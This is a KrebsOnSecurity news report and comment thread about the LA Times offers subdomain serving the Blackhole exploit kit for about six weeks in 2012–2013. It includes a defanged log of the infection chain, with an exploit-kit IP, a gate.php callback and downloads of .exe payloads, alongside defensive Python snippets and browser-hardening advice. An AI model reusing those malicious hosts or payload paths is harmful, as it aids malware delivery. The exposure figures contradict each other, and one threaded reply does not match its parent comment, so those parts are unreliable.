February 13, 2013

The Los Angeles Times has scrubbed its Web site of malicious code that served browser exploits and malware to potentially hundreds of thousands of readers over the past six weeks.

On Feb. 7, KrebsOnSecurity heard from two different readers that a subdomain of the LA Times’ news site (offersanddeals.latimes.com) was silently redirecting visitors to a third-party Web site retrofitted with the Blackhole exploit kit. I promptly asked my followers on Twitter if they had seen any indications that the site was compromised, and in short order heard from Jindrich Kubec, director of threat intelligence at Czech security firm Avast. 

Kubec checked Avast’s telemetry from its user base, and discovered that the very same LA Times subdomain was indeed redirecting visitors to a Blackhole exploit kit, and that the data showed this had been going on since at least December 23, 2012.

Contacted via email, LA Times spokeswoman Hillary Manning initially said a small number of users trying to access a subdomain of the site were instead served a malicious script warning on Feb. 2 and 3. But Manning said this was the result of a glitch in Google’s display ad exchange, not a malware attack on the company’s site.

“The LA Times, along with dozens of other Google ad exchange users including the New York Times, the Guardian, CNET, Huffington Post and ZDNet, were, to varying degrees, blocked by malicious script warnings,” Manning wrote in an email to KrebsOnSecurity. “The impacted sections of our site were quickly cleared and there was never any danger to users.”

Unfortunately, Avast and others continued to detect exploits coming from the news site. Manning subsequently acknowledged that the Google display ad issue was a separate and distinct incident, and that the publication’s tech team was working to address the problem.

Malicious code served by offersanddeals.latimes.com

It’s not clear how many readers may have been impacted by the attack, which appears to have been limited to the Offers and Deals page of the latimes.com Web site. Site metrics firm Alexa.com says this portion of the newspaper’s site receives about 0.12 percent of the site’s overall traffic, which according to the publication is about 18 million unique visitors per month. Assuming the site was compromised from Dec. 23, 2012 through the second week in February 2013, some 32,400 LA Times readers were likely exposed to the attack.

Security experts warn that the LA Times incident is, unfortunately, all too common. A report released this week by security and antivirus firm Sophos found that 80 percent of the Web sites where the company detects malicious content are innocent, legitimate sites that have been hacked.

According to Sophos, once attackers have figured out a way to inject content into a Web site, the rest of the intrusion follows a familiar script: The attackers add malicious content (usually snippets of JavaScript) that generate links to the pages on their Blackhole site. When unsuspecting users visit the legitimate site, their browsers also automatically pull down the exploit kit code from the Blackhole server.
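As a rough sketch of how a site owner might hunt for that kind of injected content, the snippet below flags script and iframe tags whose src attribute points off-site. The domain names here are hypothetical placeholders, not the actual hosts involved in this attack:

```python
# Minimal sketch: flag script/iframe tags on a page that load content
# from third-party hosts. Domain names below are hypothetical examples.
from html.parser import HTMLParser
from urllib.parse import urlparse

class InjectionFinder(HTMLParser):
    def __init__(self, own_domain):
        super().__init__()
        self.own_domain = own_domain
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src", "")
        host = urlparse(src).netloc
        # Flag anything loaded from a host outside our own domain.
        if host and not host.endswith(self.own_domain):
            self.suspicious.append(src)

finder = InjectionFinder("example-news-site.com")
finder.feed('<p>story</p><script src="http://evil-kit.example/q.php"></script>')
print(finder.suspicious)  # ['http://evil-kit.example/q.php']
```

A real scanner would also need to catch obfuscated JavaScript that builds the off-site URL at runtime, which is exactly why injections like the LA Times one can go unnoticed for weeks.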

“Once your browser sucks in the exploit kit content from the Blackhole server, the attack begins,” the company wrote in its latest threat report (PDF).  “The exploit code, usually JavaScript, first works out and records how your browser arrived at the Blackhole server. This identifies the affiliates who generate the traffic in the first place, so they can be paid just like affiliates in the legitimate economy. Then the exploit code fingerprints, or profiles, your browser to identify what operating system you are using, which browser version you have, and whether you have plugins installed for Flash, PDF files, Java applets and more.”
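The server-side profiling Sophos describes can be as simple as pattern-matching the visitor’s User-Agent string. A minimal illustration follows; the regular expressions are my own simplification for demonstration, not Blackhole’s actual code:

```python
# Sketch of the kind of profiling an exploit kit does server-side:
# pull OS and plugin hints out of a User-Agent string.
import re

ua = "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26"

os_match = re.search(r"Windows(?: NT)? ([\d.]+)", ua)
java_match = re.search(r"Java/([\d._]+)", ua)

profile = {
    "windows": os_match.group(1) if os_match else None,
    "java": java_match.group(1) if java_match else None,
}
print(profile)  # {'windows': '7', 'java': '1.6.0_26'}
```

An outdated Java version string like the one above is precisely the signal that tells the kit which exploit to serve.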

Unlucky visitors who are browsing the hacked page with outdated plugins will have their PCs infected with malware of the attacker’s choosing.

The LA Times attack highlights the daily security challenges facing Web site owners and Internet users. Keeping your browser and operating system up-to-date with the latest patches is a great start, but it’s not enough to keep you safe on the Web today.

I recommend that users remove unneeded and buggy plug-ins like Java, and use tools to block the automatic execution of JavaScript, which should neuter most of these exploit kit attacks. Check out my primer “Tools for a Safer PC” for more details on how to tackle this. Also, Web site owners need to do their part to keep their sites secure. Ars Technica recently published a readable and useful primer on the major pitfalls that lead to hacked Web sites.

Update, 1:17 p.m. ET: In response to this story, The Los Angeles Times just released the following statement: “On February 6th the Los Angeles Times was made aware that malware was possibly being served by OffersandDeals.latimes.com. We quickly determined the problem was contained within the Offers & Deals sub-domain, which is maintained by a third party. Our forensics team undertook what is now an ongoing investigation and is working closely with the vendor to collect evidence surrounding the event.  To ensure safety, the Offers & Deals platform has been rebuilt and further secured. The sub-domain generates only advertising content and does not contain any customer information. As a trusted source of news and information, The Times takes matters of internet security very seriously and are pleased to report that there is no malware currently detectable on Offers & Deals.”

39 thoughts on “Exploit Sat on LA Times Website for 6 Weeks”

  1. d

    Good to know.

    I’m using a Mac. I removed Flash a long time ago and Java isn’t present. I also use LittleSnitch and Safari Cookies to clean out the leftovers after visiting certain sites. I normally visit the LA Times a few times a week. While I never go to that subdomain, I always see an attempt to connect to offersanddeals.latimes.com.

    I, of course, will set up a rule to block these attempts.

    1. brian krebs

      Just a bit more info from yet another source, since the LAT seems to be still downplaying this in their public statements and suggesting that maybe they weren’t compromised, they’re not done with their review yet, etc.

      This comes from the Shadowserver Foundation, which tracks botnet activity and other bad stuff online. Several weeks ago, the foundation included this in one of their alerts (the hxxp is so that these don’t get turned into links):

      GET hxxp://209.126.248[.]50/c4a321872a63beed06c2476901dc4e8a/q.php
      hxxp://offersanddeals.latimes[.]com/places/embed Mozilla/5.0
      (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
      Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26
      Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26

      Leads to Pony & ZeroAccess:

      POST hxxp://65.75.137[.]237/gate.php Mozilla/4.0
      (compatible; MSIE 5.0; Windows 98)
      GET hxxp://first-cdn-node[.]com/1.exe Mozilla/4.0
      (compatible; MSIE 5.0; Windows 98)
      GET hxxp://first-cdn-node[.]com/6.exe Mozilla/4.0
      (compatible; MSIE 5.0; Windows 98)
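The hxxp and [.] mangling in those indicators is a standard defanging convention, and reversing it is mechanical. A small sketch for anyone who wants to work with such indicators programmatically:

```python
# "Defanged" indicators (hxxp, [.]) keep IOCs from becoming live links.
# Reversing the convention is just a pair of string replacements.
def refang(ioc: str) -> str:
    return ioc.replace("hxxp", "http").replace("[.]", ".")

print(refang("hxxp://offersanddeals.latimes[.]com/places/embed"))
# http://offersanddeals.latimes.com/places/embed
```

Needless to say, refanged URLs from an incident like this should never be opened in a browser.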

  2. Vee

    I wonder if browsers like Firefox, which implement Attack Site warnings, warned users to avoid the site. That’s really the only method I can see that saves users from security neglect. I mean, even if they had NoScript they’d probably have the LA Times in their whitelist, so I don’t think it’d help them here. Well, unless it’d pick it up as a third-party script.

  3. Rabid Howler Monkey

    From the article:
    “Sophos found that 80 percent of the Web sites where the company detects malicious content are innocent, legitimate sites that have been hacked.”

    Is it time to jettison the phrase “trusted web sites” and replace it with something more appropriate, such as “frequently-visited web sites”? The word “trust” (and derivations) is over-used with web browsers. For example, Internet Explorer has its “Trusted” Zone and Firefox, with the NoScript add-on, refers to “whitelisted” vs. “untrusted” sites, implying that “whitelisted sites” are trusted.

    Coarse though it may be, whitelisting frequently-visited web sites in one’s browser(s) is better than nothing, and it complements the protection of the web site blacklists maintained by Google and Microsoft. Users need to “step up” and take some responsibility for their own on-line safety.

    P.S. 1 This article serves to reinforce advice from Brian’s earlier articles regarding “watering holes”.

    P.S. 2 Speaking of plug-ins, there appears to be an Adobe Reader zero-day in the wild:


    1. Vee

      Well said, brother.

      I assume you mean “blacklist” here: “Coarse though it may be, whitelisting frequently-visited web sites in ones browser(s)” right? Or am I missing something, is why I ask.

      And on that Adobe Reader 0 day, are other .pdf readers generally safer solely based on their smaller userbase or are there any that truly have better security? Personally I’ve whittled down all my plugins to only flash being enabled, and lately I’m considering disabling flash and going html5 video.

      Krebs you need a forum for us to swap security tips sometime, even though it’d probably be high maintenance and attack targeted.

        1. Vee

          Oh yeah, I agree with that. With NoScript you never know what does what unless you’re a page-source-viewing deity or something. Maybe someday they’ll make scripts selectively blockable like it does with Flash, but I imagine it’d be hard to do, so I’ll take its black-and-white (list, for that matter) stance over nothing. Its high point for me has been for sites I don’t frequent.

          Probably live CDs would be the safest way to browse the web, but no one wants to mess with them just for that. Next would probably be virtual machines. I wonder if anyone has ever played with the idea of a virtual machine web browser.

          1. Matthew Reed

            I do use a VM for web browsing. It can be a bit cumbersome, so I break it down like this: while I keep my host OS patched and as clean as possible, I treat it as “compromised” and I NEVER put any personal information, payments or anything I wouldn’t want posted to the world on the host OS. I use the host for my daily “read only” activities.

            I keep a clean and updated snapshot of a VM on my primary machine and spin that up to log into my bank, credit cards, utilities, financial portfolio. I revert to the clean snapshot every time I spin it up in the event I picked something up along the way. At least once a month, I patch and scan the snapshot and update it as the new “clean” snapshot.

            It does require a 45 second delay to open a browser for banking but I think anyone reading this would understand why I think it is worth it.

      1. nov


        [And on that Adobe Reader 0 day, are other .pdf readers generally safer solely based on their smaller userbase or are there any that truly have better security?]

        An alternative PDF reader mentioned by Brian in December 2011 was PDF-Xchange Viewer.
        Mentioned in the second paragraph from the end of his article here:

        PDF-Xchange Viewer does have fewer advisories than Adobe Reader version 10, as shown here:

        http://secunia.com/advisories/product/18144/?task=advisories (PDF-Xchange Viewer advisories)

        http://secunia.com/advisories/product/33102/?task=advisories (Using Adobe Reader version 10 as a comparison, instead of version 11).

        1. Vee

          Wow, thanks a ton for that! I had also remembered Krebs had once recommended those as well, but I couldn’t find the link, which was the one you posted. I’m actually going to try out a GNU GPL PDF reader called Evince, which I’ve used before in Fedora Linux, while still disabling its browser plugin if it has one (pretty sure it does). I bookmarked that PDF-Xchange Viewer though; that is more what I’m looking for on a security basis, with it having fewer reports. I still wonder, even though other PDF viewers aren’t as targeted as Adobe Reader, if that just means there’s a lot of unknown vulnerabilities waiting to happen.

          I’m actually pretty happy I can FINALLY dump Adobe Reader after all these years!

    2. Onur Komili

      You quote a line from the paper that doesn’t have the word you accuse him of using. There’s a difference between “legitimate” and “trusted”. I interpret legitimate as a site that exists for a purpose other than malicious intent. That’s not to say it isn’t compromised and doing just that though.

      … and just to twist your words, a “frequently-visited web site” as you suggest wouldn’t really work either. A successful malicious campaign site will receive a lot of traffic for an extended period of time and can be considered a frequently visited site even though it’s there purely for malicious purposes.

      1. Rabid Howler Monkey

        I didn’t accuse Brian of using the word ‘trusted’. Instead, my examples were taken directly from the language used by modern web browsers.

        As for ‘frequently-visited web site’, that was meant to be from the perspective of an individual user. As well as an example of an alternative to ‘trusted’. But, I agree that ‘legitimate’, used by Brian in the article, or some other word or phrase might be better than what I used in my comment. I was mainly railing against the word ‘trusted’ (and derivations) used by modern web browsers themselves.

        1. nikol

          I would like to see the word “updates” be updated. In the auto industry, an update on faulty brakes is a recall. When jumbo jets need an update, they may ground the entire fleet worldwide to repair the defect.

      2. Vee

        Basically there shouldn’t be any false sense of security, and all sites should be treated equally as far as risk. Even here, many have started to leave krebsonsecurity in their NoScript blacklist after reading his watering hole story.

    1. Rabid Howler Monkey

      Since I am still on Windows XP and Vista, can you tell me whether Windows 8 with Internet Explorer 10 (soon to be released for Windows 7) provides an easy way for users to manage ‘legitimate’ web sites via whitelisting? Based on the mitigations and workarounds described for the Internet Explorer vulnerabilities in Microsoft bulletin MS13-009, I’d say not.

      Another question: Why doesn’t Microsoft, by default, have Internet Explorer running in Enhanced Security Configuration on its client operating systems (e.g., Windows XP, Vista, 7 and 8)?

      This, at least, would give some fraction of its consumer, SOHO and small business customers a fighting chance. They’d at least have an opportunity to think about adding unknown web sites to Internet Explorer’s “Trusted” Zone.

      Note that Microsoft’s Enhanced Security Configuration (ESC) is built into their Windows server operating systems. While the ESC default behavior is not user-friendly, the Internet Explorer menu item ‘File’ -> ‘Add this site to’, also built into ESC, allows a user to go to a URL and easily add the URL to the Trusted Zone. Here’s a link to this described behavior for Windows Server 2003 (see the section “Add sites to the Trusted Sites zone”):


      1. mechBgon

        RHM, regarding IE and adding sites to the Trusted Zone, I don’t think that’s done very often in real-world usage. And that’s a good thing, since the Trusted Sites Zone’s default security level isn’t that high (Protected Mode’s disabled, for example).

        The Internet Zone’s default settings are reasonable, particularly on Vista/7/8 where Protected Mode, DEP and ASLR are enabled, and ActiveX controls have to be opted-in by the user. Microsoft and other browser makers could radically increase security just by disabling scripting by default, but what would the customer’s first impression be? “This software is broken, my previous browser had no problem with __________ (insert name of mainstream website).” They’re never going to go there.

        But since you asked about IE10 and Win8… I learned a lot from this article, even though it kind of made my head explode:
        http://blogs.msdn.com/b/ieinternals/archive/2012/03/23/understanding-ie10-enhanced-protected-mode-network-security-addons-cookies-metro-desktop.aspx?Redirected=true The Metro version of IE is plug-in-proof with the exception of a handful of sites that can use Flash Player, and the whole thing runs in an AppContainer that super-sandboxes it.

        As long as it’s a 64-bit version of Win8, the desktop version of IE can run its tabs in separate AppContainers too, by checking the “Enhanced Protected Mode” checkbox found in the Advanced tab of Internet Options. For sites that can’t work in EPM, there’s site-by-site fallback to regular Protected Mode on demand.

        It’ll be interesting to see the bad guys’ countermoves to these new hurdles. My guess: the great security-bypass extravaganza known as Java.

        1. Rabid Howler Monkey

          To understand where I am coming from, take a look at the MS13-009 security bulletin for February, 2013:


          Note that the two MS13-009 security vulnerabilities are mitigated on Windows server OSs because they default to Enhanced Security Configuration (ESC). Windows client OSs, with all of Microsoft’s security bells and whistles, instead require workarounds that essentially mimic ESC on Windows server OSs. This situation is not uncommon with Internet Explorer vulnerabilities.

          There are two philosophies at Microsoft regarding Internet Explorer security. For Windows server OSs, ESC is used to harden IE default settings so that the Internet Zone operates at a High security setting and the Trusted Zone operates at a Medium security setting. Significantly, JavaScript is prohibited in the Internet Zone and allowed in the Trusted Zone. With Windows Server 2003, there is a relatively easy process to add web sites to the Trusted Zone (see my above post). With Windows Server 2008 and 2008 R2, adding a site to the Trusted Zone is also relatively easy:


          This is, more or less, how Firefox (with the NoScript add-on), Chrome (with or without the NotScripts extension) and Opera handle “trusted” web sites. One must overtly add web sites to the managed whitelist. Getting redirected to a web site controlled by the miscreants will result in a failed exploit attempt as JavaScript is disabled since the site isn’t whitelisted.

          The second philosophy applies to Windows client OSs and is essentially as you have described it in your post. JavaScript is allowed to run in the Internet Zone and runs in IE’s sandbox, which is enhanced in Windows 8.

          IMO, it would be nice to have an option on Windows client OSs to easily add sites to IE’s Trusted Zone, change the Trusted Zone security level to Medium and change the Internet security level to High. One could name this option ‘Enhanced Security Configuration’ and easily toggle IE from one philosophy to the other (and even use Group Policy settings to set the appropriate philosophy for users).

          As an example, for online banking with a dedicated Windows PC, I’d set up a standard user account for that purpose, toggle IE to Enhanced Security Configuration, add my banking site(s) to my Favorites, add them to the Trusted Zone and then do my business. I would want my banking site(s) to have a higher level of “trust” than sites I could potentially be redirected to if the banking web sites were compromised (as was the Bank of India several years ago).

          1. mechBgon

            I understand now, and at one time IE did have an easier way to assign sites to zones with a mini-button on the Status Bar at the bottom of the screen, which Microsoft has gone away from.

            There is a practical, but clumsy, way to toggle between two configurations: set up a second user account on the computer and configure its Internet Options as desired, then run the browser as that user when you want that configuration by right-clicking and choosing Run As Different User (or setting up a dedicated launch icon with RunAs included, to automate this).

            I use this technique at work to monitor two Gmail accounts simultaneously. For the purpose of banking, another practical benefit is that the browser sees the file system from the point of view of the secondary account, and vice versa. So if one’s banking browser and downloaded financial information are in an entirely different Windows account, they are insulated from one’s daily-usage Windows account, its browser, and exploits running in the context of that account.

      2. rb

        @RHM, I believe you answered your own question:

        “the ESC default behavior is not user-friendly”

        Most ordinary users don’t want to have to fiddle with things like this. They just want it to work, in the same way their toaster or TV just works.

        This is the same reason why NoScript on Firefox is such a great solution for the security-conscious (who will put up with the additional work needed to manage permissions), but a terrible solution for everyone else.

        1. Rabid Howler Monkey

          Understood. All I’m asking for is the *option* to toggle Internet Explorer to Enhanced Security Configuration on Windows client OSs. Microsoft doesn’t have to make ESC the default behavior.

          Also, please note I don’t expect this to happen anytime soon. Thus, I ignore Internet Explorer on my Windows systems (aside from applying security updates).

  4. Derek

    So was the attack JavaScript being served directly from offersanddeals.latimes.com, or from a linked domain? I’m wondering if I was vulnerable if I only whitelisted latimes.com in NoScript, and blocked everything else…

    1. OhioMC

      I believe so. RequestPolicy was only blocking if you locked down to Full Address, not just Base or Full Domain.

    2. Neej

      Bear in mind I’m in no way qualified to give this advice (so anybody feel free to correct me), but as I read the article, even with the LA Times site and the particular subdomain whitelisted, the attack would have been stopped, since the browser would block the Blackhole server when the JS on the LA Times site called it.

      “When unsuspecting users visit the legitimate site, their browsers also automatically pull down the exploit kit code from the Blackhole server.”

  5. JimV

    Guess now I’m not so irritated that the LA Times daily newsletter I’d been receiving for some years stopped arriving sometime last Autumn (despite still being toggled in my account settings). My visits to the site dropped off radically as a consequence of the monthly restriction imposed on free viewing of articles anyway, but I never would have clicked on to follow any of the webpage ads offered there to begin with.

  6. Chris

    Correct me if I’m wrong, but isn’t the “exposed reader” math off in the piece by a factor of 10?

    .12% of 18,000,000 = .0012 x 18,000,000 = 21,600 visitors per month

    1.5 months x 21,600 visitors/month = 32,400 visitors

    Quite a significant difference in my opinion.

    1. timeless

      Chrome is only available as a 32-bit application. Getting a browser (really, its JavaScript JIT and VM) to work well on 64-bit is hard.

      For Firefox, we added code to tell sites we were running 32-bit on a 64-bit OS; Chrome might not have, or may have decided not to expose this detail for privacy/security reasons.

      1. BrianKrebs Post author

        Yes, as Timeless said, Chrome is a 32-bit browser. There is currently no 64-bit version of Chrome that I’m aware of.

  7. Jorge Lopez

    I was an LA Times subscriber, and I did not like that when I signed in to my account at the LA Times website, I was forced to accept third-party cookies like DoubleClick and others. If I did not accept them, I could not log in. I called the Times and told them that I did not like my information being sold to third parties. They told me that it was necessary.

  8. ted

    I would like browsers to refuse to load a script or image that has an IP address in its URL.


    This format should be a red flag.
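A check like the one described above is straightforward to sketch: treat any URL whose host portion is a bare IP address as suspect. This is illustrative only; a real browser policy would need exceptions for intranet addresses and the like:

```python
# Sketch of the suggested red-flag check: URLs whose host is a bare
# IP address (as in the exploit-kit callbacks quoted earlier) are flagged.
import ipaddress
from urllib.parse import urlparse

def host_is_ip(url: str) -> bool:
    host = urlparse(url).hostname or ""
    try:
        ipaddress.ip_address(host)  # raises ValueError for normal hostnames
        return True
    except ValueError:
        return False

print(host_is_ip("http://209.126.248.50/q.php"))   # True
print(host_is_ip("http://www.latimes.com/news"))   # False
```

Blocking on this signal alone would break some legitimate sites, which is presumably why browsers have not adopted it wholesale.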

  9. Eric Heitzman

    Please forgive the commercial nature of this comment, it’s not SPAM in this case since I feel it is apropos:

    Qualys offers two services that might be of interest to your readers:
    1. The free “BrowserCheck” helps individuals and businesses check the security of their browser and plugins such as Flash, Java and Silverlight, to help prevent getting exploited. (https://browsercheck.qualys.com)

    2. For businesses, our web server based Malware Detection Service monitors your web site for evidence of compromise, or instances where it is serving up malware. (http://www.qualys.com/enterprises/qualysguard/malware-detection/).

    Hope that helps someone,


    1. Heron

      Advertisements can seem “apropos,” but still be unwelcome commercial content. I think it’s bad form to advertise a product in online comments.

  10. nov

    About the “glitch in Google’s display ad exchange” mentioned in the article: on February 7th and 8th, Suricata with Emerging Threats Pro was detecting lower-severity (level 3) alerts on three Google IP addresses associated with offersanddeals.latimes.com.

    Overall, urlquery.net reported “No alerts detected” [false positives, which seems right so far].

    Reference the Intrusion Detection System section:

  11. nov

    About the LAT and other news sources being a “trusted source of news and information”: I don’t see ‘details’ of these attacks coming from them. No thanks; I don’t trust general news sources to report on this incident and the many other incidents continuously occurring on other legitimate sites.

  12. Karden Snow

    I loved it when the LA Times reporter told Brian via Twitter that it was, what were his words, something like “no big deal”, that this breach had occurred. What is the liability for the LA Times and its careless attitude about serving up malware to half a million subscribers? Where’s a lahyuh when you need one?

    1. JimV

      They’re probably more inclined to troll among or sniff around those folks who were trapped aboard that disabled Carnival ship due to the ready cash reserves of its owner and the bounded number of potential litigants by comparison with the shaky Tribune group’s finances and an amorphous number of not-so-obviously injured parties in some prospective class-action likely to extend over some years….

Comments are closed.